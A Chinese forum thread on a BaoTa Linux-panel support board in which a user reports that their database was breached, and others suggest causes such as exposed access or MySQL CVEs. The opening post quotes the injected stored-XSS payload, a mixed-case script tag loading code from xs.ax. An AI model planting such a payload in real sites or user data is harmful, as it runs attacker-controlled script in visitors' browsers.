当前位置:论坛首页 > Linux面板 > 讨论

【待反馈】数据库被入侵了,发布一下细节

发表在 Linux面板2022-8-3 17:40 [复制链接] 5 6267

用户表的用户名被加入了<sCRiPt/SrC=//xs.ax/hAz2>,导致前台显示用户名的时候页面导入xs.ax/hAz2里面的内容,不知道怎么被入侵的,一头雾水。是专业版太差了吗,要升级企业的吗?
使用道具 举报 只看该作者 回复
发表于 2022-8-4 09:19:46 | 显示全部楼层
您好,您的数据库开启外网访问了吗?
使用道具 举报 回复 支持 反对
发表于 2022-8-4 10:33:02 | 显示全部楼层
大炮运维V587 发表于 2022-8-4 09:19
您好,您的数据库开启外网访问了吗?

你好,数据库访问权限,一直是本地服务器访问,现在升级企业版了,但是企业版的重构防篡改安装不上,一直报错
使用道具 举报 回复 支持 反对
发表于 2022-8-4 19:32:33 | 显示全部楼层
宝塔装的mysql不是最新的,可能有CVE
使用道具 举报 回复 支持 反对
发表于 2022-8-4 19:34:45 | 显示全部楼层
也有可能你的程序有问题
使用道具 举报 回复 支持 反对
发表于 2022-9-19 15:43:17 | 显示全部楼层
宝塔用户_fcgtve 发表于 2022-8-4 10:33
你好,数据库访问权限,一直是本地服务器访问,现在升级企业版了,但是企业版的重构防篡改安装不上,一直 ...

您好 请问问题处理好了吗 安装不上报错截个图麻烦发一下,是什么系统?
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

点击联系技术免费分析

工作时间:09:00至18:30

快速回复 返回顶部 返回列表